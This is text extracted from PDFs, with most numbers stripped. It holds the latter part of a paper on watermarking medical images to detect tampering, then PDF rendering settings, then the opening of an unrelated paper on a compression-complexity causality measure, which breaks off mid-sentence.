combined using the dynamic keys. sha- is used to get the initial key for the symmetric encryption process. the key is dynamic and depends on the patient information, this makes it easier to detect intentional changes. table the mean square error of the proposed approach. images/size/jpeg mean square error of the proposed approach single-lsb single-bit sb single-bit sb thr/ * , . kb . . . aa/ * , . kb . . . ab/ * , kb . . . ac/ * , kb . . . flu/ * , kb . . . gastro/ * , . kb . . . thr/ * , . kb . . . table the ssim for the proposed approach. images/size/jpeg ssim of the proposed approach single-lsb single-bit sb single-bit sb thr/ * , . kb . . . aa/ * , . kb . . . ab/ * , kb . . . ac/ * , kb . . . flu/ * , kb . . . gastro/ * , . kb . . . table the uiqi for the proposed approach. images/size/jpeg uiqi of the proposed approach single-lsb single-bit sb single-bit sb thr/ * , . kb . . . aa/ * , . kb . . . ab/ * , kb . . . ac/ * , kb . . . flu/ * , kb . . . gastro/ * , . kb . . . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ invisibility evaluation the psnr between the watermarked image and the original image is used to evaluate the visual quality. psnr ¼ log s mse � � ( ) table shows that the single-lsb has a better result compared with the single-bit sb and the single-bit sb. table shows the peak signal to noise ratio of some of the existing approaches. the results show that the psnr of the proposed approach is better than the tested approaches. comparison results by comparing the proposed work with the existing work, the created code is distributed at every pixel of the cover medical image and not only in the regions of non-interest pixels, while the image details are still preserved. most of the existing watermark is embedded in non-interest, which facilitates the attacking process. the proposed algorithm succeeded in determining the intentional changes in the patient image up to � pixels. there is a big difference between the proposed model and the existing models which is the performance of the existing approach measured by its ability to extract the watermark from the original image. but the proposed approach preserves the watermark and the original image at the same time. this difference gives the proposed model the advantage of discovering the attacks that the images may be exposed to. this is because the proposed table the peak signal to noise ratio of the proposed approach. images/size/jpeg peak signal to noise ratio of the proposed approach single-lsb single-bit sb single-bit sb thr/ * , . kb . . . aa/ * , . kb . . . ab/ * , kb . . . ac/ * , kb . . . flu/ * , kb . . . gastro/ * , . kb . . . table the peak signal to noise ratio of some of the existing approaches. techniques psnr (db) alattar ( ) . shih & wu ( ) . thodi & rodríguez ( ) . zhao et al. ( ) . wang, lee & chang ( ) . shih & zhong ( ) . bamal & kasana ( ) . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ method creates the watermark from one of the components of the original image and not by adding a watermark image to the image. discussions this subsection discusses the proposed algorithm in various aspects such as authenticity and integrity, and prevention against intentional attacks. authenticity and integrity authenticity and security are the most significant requirements for medical image protection. because with any deliberate change of the image, a wrong decision by the physician will result. figure demonstrates the proposed algorithm that detects the attacks: the vulnerability assessment approach is based on assuming intentional changes in the patient image up to � pixels. the evaluation also includes the change between the color components. figures ( )–( ) demonstrate different attack regions, and all of them are detected by the proposed algorithm. table shows the ability of the proposed algorithm to detect the intentional attacks. from the image quality point of view, it is clear that the choice of the single lsb gave the best image quality performance over the rest of the elements and the single-bit sb comes in the second rank. from the ability of the algorithm to detect the intentional attacks, the proposed algorithm succeeded in determining intentional changes in the patient image up to � pixels especially in the case of single-bit sb. future work the aim of embedding the watermark is to preserve the medical images from any intentional or unintended interference. therefore, in the future, we will try to find different methods to achieve this goal and for that, we propose the following: . to protect the blockchain record, a new idea will be proposed based on the combination of the watermarking, the qr code, and the interplanetary file system (ipfs). . use of word embedding (smith, ) technique to create an efficient watermark. word embedding is one of the important developments in natural language processing. the key benefit of word embedding is that by preserving the semantic similarity of words and constructing a low-dimensional vector, it allows for a more expressive and effective representation. . the t-sne dimensionality reduction (heuer, ) can be used to compare the original image with the watermarked image and it will help in the extraction of the watermark. . the amount of cybersecurity data generated in the form of unstructured texts (simran et al., ), such as social media tools, blogs, posts, and so on, has increased remarkably in recent years. called entity recognition (ner) is an initial step in the conversion of this unstructured data into structured data that many applications may use. the unstructured texts could be used to create a watermark that would be difficult to expose to deliberate attacks that would alter patients' information nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure proposed approach for forgery detection of medical images. full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure the modification of the ab image. (a) the ab image is modified at red the by same blue component from raw – and column – (b) the ab image is modified in red by blue component at row from to and column – lsb. full-size doi: . /peerj-cs. /fig- figure the modification of the ac image. (a) the ac image is modified at blue the by same green component from raw – and column – (b) the ac image is modified in red component by at row from to and column – lsb. full-size doi: . /peerj-cs. /fig- figure the modification of the flu image. (a) the flu image is modified at blue by green component at row from to and column – (b) the flu image is modified at red by the same blue component at row from to and column – . full-size doi: . /peerj-cs. /fig- figure the modification of the gastro image. (a) the gastro image is modified at red component by in raw – and column – (b) the gastro image is modified in red by blue component at row from to and column – lsb. full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions in this article, a robust spatial watermarking algorithm for medical images has been proposed. this new approach to maintain high data security combines integrity protection, encryption algorithms, and steganography techniques. the performance of the proposed algorithm is evaluated for the desired outcome is obtained without significant degradation in the extracted covered image and the ability of the code against the intentional destruction of the medical image. the proposed approach has the following advantages: � the processed images have the same size as input images. � the proposed approach is valid for all the image shapes and not only for the rectangular shape as in many of the existing works. � the approach applies to every rgb images. � the created secret code has dynamic properties based on:-imaging device manufacturers. -basic components of color images (r, g, and b). � its advantage over the other approaches is that the created code is distributed at every pixel of the cover medical image and not only in the regions of non-interest pixels (roni). � although the digital watermark is distributed on every pixel on the image the code does not affect the output image quality. � the encryption of watermarks uses hash function properties, which are extremely sensitive to the initial value, to enhance the security of watermarks. � although there is a watermark in every pixel in the image, it represents / of the pixel, but it did not affect the quality of the image. � it solves the problem that exists in the spatial domain algorithms that cannot simultaneously offer protection against intentional attacks and robustness. � the proposed approach preserves the watermark and the original image at the same time. this is because the proposed method creates the watermark from one of the components of the original image and not by embedding a watermark image in the image. table the forgery detection rate. tampared block size to image (tbsi) % x “forgery detection rate (fdr) based on correlation between original image and tampared image” thr, ( * )/( * ) = . successful . aa, ( * )/( * ) = . successful . ab, ( * )/( * ) = . successful . ac( * )/( * ) = . successful . flu, ( * )/( * ) = . successful . gastro, ( * )/( * ) = . successful . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � ahmad nagm conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � mohammed safy elwan performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: matlab code is available as a supplemental file. publicly available data located at mendeley: ali, sharib; zhou, felix; daul, christian; braden, barbara; bailey, adam; east, james; realdon, stefano; georges, wagnieres; loshchenov, maxim; blondel, walter; grisan, enrico; rittscher, jens ( ), “endoscopy artefact detection (ead) dataset”, mendeley data, v , doi . /c fjbxcgj . . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahvanooey mt, li q, zhu x, alazab m, zhang j. . anitw: a novel intelligent text watermarking technique for forensic identification of spurious information on social media. computers & security ( ): doi . /j.cose. . . al-afandy ka, el-shafai w, el-rabaie e-sm, abd el-samie fe, faragallah os, el-mhalaway a, shehata am, el-banby gm, el-halawany mm. . robust hybrid watermarking techniques for different color imaging systems. multimedia tools and applications ( ): – . alattar am. . reversible watermark using the difference expansion of a generalized integer transform. ieee transactions on image processing ( ): – doi . /tip. . . allaert fa, dusserre l. . security of health information system in france: what we do will no longer be different from what we tell. international journal of bio-medical computing : – . armoni a. . the use of artificial intelligence techniques and applications in the medical domain. in: healthcare information systems: challenges of the new millennium. pennsylvania: igi global, – . bamal r, kasana ss. . slantlet based hybrid watermarking technique for medical images. multimedia tools and applications ( ): – doi . /s - - - . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://dx.doi.org/ . /c fjbxcgj . http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cose. . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hernández jr, perez-gonzalez f, rodriguez jm. . the impact of channel coding on the performance of spatial watermarking for copyright protection. in: proceedings of the ieee international conference on acoustics, speech and signal processing, icassp' (cat. no. ch ). vol. . piscataway: ieee, – . heuer h. . text comparison using word vector representations and dimensionality reduction. arxiv. available at http://arxiv.org/abs/ . . huang h-c, pan js, wang fh. . genetic watermarking on transform domain. in: pan js, huang h-c, jain lc, eds. intelligent watermarking techniques, ch. . singapore: world scientific, – . jennett p, watanabe m, igras e, premkumar k, hall w. . telemedicine and security. confidentiality, integrity, and availability: a canadian perspective. studies in health technology and informatics : – . katsikas s. . information systems security: facing the information society of the st century. new york: springer. langelaar gc, setyawan i, lagendijk rl. . watermarking digital image and video data: a state-of-the-art overview. ieee signal processing magazine ( ): – doi . / . . memon na, chaudhry a, ahmad m, keerio za. . hybrid watermarking of medical images for roi authentication and recovery. international journal of computer mathematics ( ): – . memon na, gilani sam. . watermarking of chest ct scan medical images for content authentication. international journal of computer mathematics ( ): – doi . / . mousavi sm, naghsh a, abu-bakar sar. . watermarking techniques used in medical images: a survey. journal of digital imaging ( ): – doi . /s - - - . nagm a, safy m. . a robust watermarking algorithm for medical images. indonesian journal of electrical engineering and computer science ( ): doi . /ijeecs.v .i .pp - . nagm a, torky m, ghazala mma, sayed hef. . image protection against forgery and pixel tampering based on a triple hybrid security approach. in: international conference on advanced intelligent systems and informatics. cham: springer, – . nagm am, torky m, youssef ky. . a novel watermarking approach for protecting image integrity based on a hybrid security technique. international journal of computer applications ( - ) ( ): – . nyeem h, boles w, boyd c. . a review of medical image watermarking requirements for teleradiology. journal of digital imaging ( ): – doi . /s - - -x. pan w, coatrieux g, cuppens-boulahia n, cuppens f, roux c. . medical image integrity control combining digital signature and lossless watermarking. in: data privacy management and autonomous spontaneous security. berlin: springer, – . pan js, huang hc, jain lc. . intelligent watermarking techniques. vol. . singapore: world scientific. priya s, santhi b, swaminathan p. . image watermarking techniques-a review. research journal of applied sciences, engineering and technology ( ): – . rao nv, kumari vm. . watermarking in medical imaging for security and authentication. information security journal: a global perspective ( ): – doi . / . . . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ijeecs.v .i .pp - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ savakar dg, ghuli a. . robust invisible digital image watermarking using hybrid scheme. arabian journal for science and engineering ( ): – doi . /s - - - . shih fy, wu yt. . robust watermarking and compression for medical images based on genetic algorithms. information sciences ( ): – doi . /j.ins. . . . shih fy, zhong x. . high-capacity multiple regions of interest watermarking for medical images. information sciences ( ): – doi . /j.ins. . . . simran k, sriram s, vinayakumar r, soman kp. . deep learning approach for intelligent named entity recognition of cyber security. in: international symposium on signal processing and intelligent recognition systems. singapore: springer, – . smith na. . contextual word representations: a contextual introduction. arxiv. available at http://arxiv.org/abs/ . . swarna priya rm, maddikunta pkr, parimala m, koppu s, gadekallu tr, chowdhary cl, alazab m. . an effective feature engineering for dnn using hybrid pca-gwo for intrusion detection in iomt architecture. computer communications. thodi dm, rodríguez jj. . expansion embedding techniques for reversible watermarking. ieee transactions on image processing ( ): – doi . /tip. . . tirkel az, rankin ga, van schyndel rm, ho wj, mee nra, osborne cf. . electronic watermark. in: digital image computing, technology and applications (dicta’ ). – . van schyndel rg, tirkel az, osborne cf. . a digital watermark. in: proceedings of st international conference on image processing. – november , austin, tx, usa. vol. . piscataway: ieee, – . viswanathan p, venkata krishna p. . fusion of cryptographic watermarking medical image system with reversible property. in: international conference on information processing. berlin: springer, – . voyatzis g, pitas i. . chaotic watermarks for embedding in the spatial digital image domain. in: proceedings international conference on image processing. icip (cat. no. cb ). piscataway: ieee, – . wakatani a. . digital watermarking for roi medical images by using compressed signature images. in: proceedings of the th annual hawaii international conference on system sciences. piscataway: ieee, – . wang zh, lee cf, chang cy. . histogram-shifting-imitated reversible data hiding. journal of systems and software ( ): – doi . /j.jss. . . . wolfgang rb, delp ej iii. . overview of image security techniques with applications in multimedia systems. in: multimedia networks: security, displays, terminals, and gateways. vol. . bellingham: international society for optics and photonics, – . zain jm, clarke m. . reversible region of non-interest (roni) watermarking for authentication of dicom images. arxiv. available at http://arxiv.org/abs/ . . zhang x, wang s. . fragile watermarking scheme using a hierarchical mechanism. signal processing ( ): – . zhao z, luo h, lu z-m, pan j-s. . reversible data hiding based on multilevel histogram modification and sequential recovery. aeu-international journal of electronics and communications ( ): – doi . /j.aeue. . . . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.ins. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /j.jss. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.aeue. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ protection of the patient data against intentional attacks using a hybrid robust watermarking code introduction literature review proposed methodology implementation and experimental results comparison results discussions future work conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted december accepted april published may corresponding author aditi kathpalia, kathpaliaaditi@gmail.com academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright kathpalia et al. distributed under creative commons cc-by . open access data-based intervention approach for complexity-causality measure aditi kathpalia and nithin nagaraj consciousness studies programme, national institute of advanced studies, bengaluru, karnataka, india abstract causality testing methods are being widely used in various disciplines of science. model-free methods for causality estimation are very useful, as the underlying model generating the data is often unknown. however, existing model-free/data-driven measures assume separability of cause and effect at the level of individual samples of measurements and unlike model-based methods do not perform any intervention to learn causal relationships. these measures can thus only capture causality which is by the associational occurrence of ‘cause’ and ‘effect’ between well separated samples. in real-world processes, often ‘cause’ and ‘effect’ are inherently inseparable or become inseparable in the acquired measurements. we propose a novel measure that uses an adaptive interventional scheme to capture causality which is not merely associational. the scheme is based on characterizing complexities associated with the dynamical evolution of processes on short windows of measurements. the formulated measure, compression-complexity causality is rigorously tested on simulated and real datasets and its performance is compared with that of existing measures such as granger causality and transfer entropy. the proposed measure is robust to the presence of noise, long-term memory, filtering and decimation, low temporal resolution (including aliasing), non-uniform sampling, finite length signals and presence of common driving variables. our measure outperforms existing state-of-the-art measures, establishing itself as an effective tool for causality testing in real world applications. subjects adaptive and self-organizing systems, data science, scientific computing and simulation keywords causality, causal inference, intervention, compression-complexity, model-based, dynamical complexity, negative causality introduction the ‘ladder of causation’ very rightly arranges hierarchically the abilities of a causal learner (pearl & mackenzie, ). the three levels proposed are: . association, . intervention and . counterfactuals, when arranged from the lower rung to the higher rung. currently, causality learning and inferring algorithms using only data are still stuck at the lowermost rung of ‘association’. measures such as granger causality (gc) (granger, ) and its various modifications (dhamala, rangarajan & ding, ; marinazzo, pellicoro & stramaglia, ), as well as, transfer entropy (te) (schreiber, ) that are widely being used across various disciplines of science—neuroscience (seth, barrett & barnett, ; vicente et al., ), climatology (stips et al., ; mosedale et al., ), econometrics (hiemstra & how to cite this article kathpalia a, nagaraj n. . data-based intervention approach for complexity-causality measure. peerj com- put. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:\unskip \penalty -\@m kathpaliaaditi@gmail.com mailto:\unskip \penalty -\@m kathpaliaaditi@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. jones, ; chiou-wei, chen & zhu, ), engineering (bauer et al., ) etc. are largely ‘model-free’/ ‘data-driven’ measures of causality. they make minimal assumptions about the underlying physical mechanisms and depend more on time series characteristics (seth, barrett & barnett, ). hence, they have a wider scope compared to specific model assumptions made by methods such as dynamic causal modelling (friston, harrison & penny, ) and structural equation modeling (pearl, ). however, the assumptions made by these methods are often ignored in practice, resulting in erroneous causality estimates on real world datasets. these measures can accurately quantify the degree of coupling between given time series only if assumptions (such as linearity, stationarity and presence of gaussian noise in case of gc and stationarity, markovian in case of te) are satisfied. thus, these methods, when correctly applied, can infer the presence of causality when it is by ‘association’ alone and not due to higher levels on the ladder of causation. to explain this better, consider a case where the ‘cause’ and ‘effect’ are inseparable. this can happen even when the time series satisfies stationarity but is non-markovian or in several instances when it is non-stationary. in fact, the stated assumptions are quite unlikely to be met in practice considering that acquired data are typically samples of continuous/discrete evolution of real world processes. these processes might be evolving at spatio-temporal scales very different from the scales of measurements. as a result, cause and effect may co-exist in a single measurement or overlap over blocks of measurements, making them inseparable. in such a scenario, it would be incorrect to estimate causality by means of correlations and/or joint probabilities which implicitly assumes the separability of ‘cause’ and ‘effect’. both gc and te make this assumption of separability. circularly, to characterize a time series sample as purely a ‘cause’ or an ‘effect’ is possible only if there is a clear linear/markovian separable relationship. when cause and effect are inseparable, ‘associational’ measures of causality such as gc and te are insufficient and we need a method to climb up the ladder of causation. intervention based approaches to causality rank higher than association. it involves not just observing regularities in the data but actively changing what is there and then observing its effect. in other words, we are asking the question—what will happen if we ‘do’ something? given only data and not the power to intervene on the experimental set up, intervention can only be done by building strong, accurate models. model-based causality testing measures, alluded to before, will fall in this category. they invert the model to obtain its various parameters, and then intervene to make predictions about situations for which data is unavailable. however, these methods are very domain specific and the models require specific knowledge about the data. with insufficient knowledge about the underlying model which generated the data, such methods are inapplicable. given only data that has already been acquired without any knowledge of its generating model or the power to intervene on the experimental/real-world setting, we can ask the question—what kind of intervention is possible (if at all) to infer causality? the proposed ‘interventional causality’ approach will not merely measure ‘associational causality’ because it does not make the assumption that the cause and its effect are present sample by sample (separable) as is done by existing model-free, data based methods of causality estimation. kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. even in cases where cause and its effect are inseparable, which is probably true for most real-world processes, the change in the dynamics of processes would contain information about causal influences between them. with this understanding, we propose the novel idea of data-based, model-free interventional complexity causality (icc). in this paper, we formalize the notion of icc using compression-complexity to define compression- complexity causality (ccc). ccc shows some interesting properties. we test ccc on simulated and real datasets and compare its performance with existing model-free causality methods. our results demonstrate that ccc overcomes the limitations of ‘associational’ measures (gc and te) to a large extent. other methods for causality estimation based on compression have been proposed in literature (budhathoki & vreeken, ; wieczorek & roth, ), but the very philosophy behind our method and its implementation are very different from these existing methods. this paper is organized as follows. the idea of dynamical complexity and its specific realization dynamical compression-complexity are discussed in ‘dynamical complexity (dc) and dynamical compression-complexity (cc)’. interventional complexity causality and its specific case compression-complexity causality (ccc) are discussed in ‘interventional complexity causality (icc) and compression-complexity causality (ccc)’. how it is possible to obtain positive and negative values of ccc and what its implications are on the kind of causal influence is detailed in ‘positive and negative ccc’. results and discussion on the performance of ccc and its comparison with existing measures, gc and te, are included in ‘results and discussion’. this is followed by conclusions and future work in ‘conclusions’. a list of frequently used abbreviations is provided at the end of the paper. dynamical complexity (dc) and dynamical compression-complexity (cc) there can be scenarios where cause and effect co-exist in a single temporal measurement or blocks of measurements. for example, this can happen (a) inherently in the dynamics of the generated process, (b) when cause and effect occur at different spatio-temporal scales, (c) when measurements are acquired at a scale different from the spatio-temporal scale of the cause–effect dynamics (continuous or discrete). in such a case, probabilities of joint occurrence is too simplistic an assumption to capture causal influences. on the other hand, the very existence of causality here is actually resulting in a change of joint probabilities/correlations which cannot be captured by an assumption of static probabilities. to overcome this problem, we capture causality using the idea of dynamical complexity. inseparable causal influences within a time series (or between two time series) would be reflected in their dynamical evolution. dynamical complexity (dc) of a single time series x is defined as below - dc( x|xpast )=c(xpast + x)−c(xpast ), ( ) where x is a moving window of length w samples and xpast is a window consisting of immediate past l samples of x. ‘+’ refers to appending, for e.g., for time series a=[ , , ] kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and b=[p,q], then a+b=[ , , ,p,q].c(x) refers to complexity of time series x.dc, thus varies with the temporal index of x and can be averaged over the entire time series to estimate its average dc. it is important to note that dynamical complexity is very different from complexity rate (cr), which can be estimated as follows - cr( x|xpast )=c(xpast, x)−c(xpast ), ( ) where c(xpast, x) is the joint complexity of xpast and x. complexity rate can be seen as a generalization of shannon entropy rate (cover & thomas, ), the difference being that the former can be computed using any notion of complexity, not just entropy. as is evident from eqs. ( ) and ( ), cr is estimated based on the joint occurrences of x and xpast , while dc captures temporal change in complexity on the evolution of the process. in case of the inseparability of cause and effect, it would be inappropriate to use cr to infer causal relationships. now for this notion of ‘‘complexity’’, that has been referred to in this section several times, there is no single unique definition. as noted in nagaraj & balasubramanian ( b), shannon entropy (shannon, ; cover & thomas, ) is a very popular and intuitive measure of complexity. a low value of shannon entropy indicates high redundancy and structure (low complexity) in the data and a high value indicates low redundancy and high randomness (high complexity). for ergodic sources, owing to shannon’s noiseless source coding theorem (cover & thomas, ), (lossless) compressibility of the data is directly related to shannon entropy. however, robustly estimating compressibility using shannon entropy for short and noisy time series is a challenge (nagaraj & balasubramanian, a). recently, the notion of compression-complexity has been introduced (nagaraj & balasubramanian, a) to circumvent this problem. compression-complexity defines the complexity of a time series by using optimal lossless data compression algorithms. it is well acknowledged that data compression algorithms are not only useful for compression of data for efficient transmission and storage, but also act as models for learning and statistical inference (cilibrasi, ). lempel–ziv (lz) complexity (lempel & ziv, ) and effort-to-compress (etc) (nagaraj, balasubramanian & dey, ) are two measures which fall in this category. as per the minimum description length principle (rissanen, ), that formalizes the occam’s razor, the best hypothesis (model and its parameters) for a given set of data is the one that leads to its best compression. extending this principle for causality, an estimation based on dynamical complexity (compressibility) of time series would be the best possible means to capture causally influenced dynamics. out of the complexity measures discussed before, etc seemed to be most suitable for estimation of dynamical complexity. etc is defined as the effort to compress the input sequence using the lossless compression algorithm known as non-sequential recursive pair substitution (nsrps). it has been demonstrated that both lz and etc outperform shannon entropy in accurately characterizing the dynamical complexity of both stochastic (markov) and deterministic chaotic systems in the presence of noise (nagaraj & balasubramanian, a; nagaraj & balasubramanian, b). further, etc has shown kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to reliably capture complexity of very short time series where even lz fails (nagaraj & balasubramanian, a), and for analyzing short rr tachograms from healthy young and old subjects (balasubramanian & nagaraj, ). recently, etc has been used to propose a compression-complexity measure for networks (virmani & nagaraj, ). in order to faithfully capture the process dynamics, dc is required to be estimated on overlapping short-length windows of time series data. infotheoretic quantities (like shannon entropy), which are based on the computation of probability densities, are not the ideal choice here (owing to finite-length effects). compression-complexity measures are more appropriate choices. because of the advantages of etc over lz mentioned above, we use etc to formulate our measure of causality discussed in the next section. before that, we describe how individual and joint compression complexities are computed using etc (nagaraj, balasubramanian & dey, ) in the subsections below. etc measure for a time series: etc(x ) since etc expects a symbolic sequence as its input (of length > ), the given time series should be binned appropriately to generate such a sequence. once such a symbolic sequence is available, etc proceeds by parsing the entire sequence (from left to right) to find that pair of symbols in the sequence which has the highest frequency of occurrence. this pair is replaced with a new symbol to create a new symbolic sequence (of shorter length). this procedure is repeated iteratively and terminates only when we end up with a constant sequence (whose entropy is zero since it consists of only one symbol). since the length of the output sequence at every iteration decreases, the algorithm will surely halt. the number of iterations needed to convert the input sequence to a 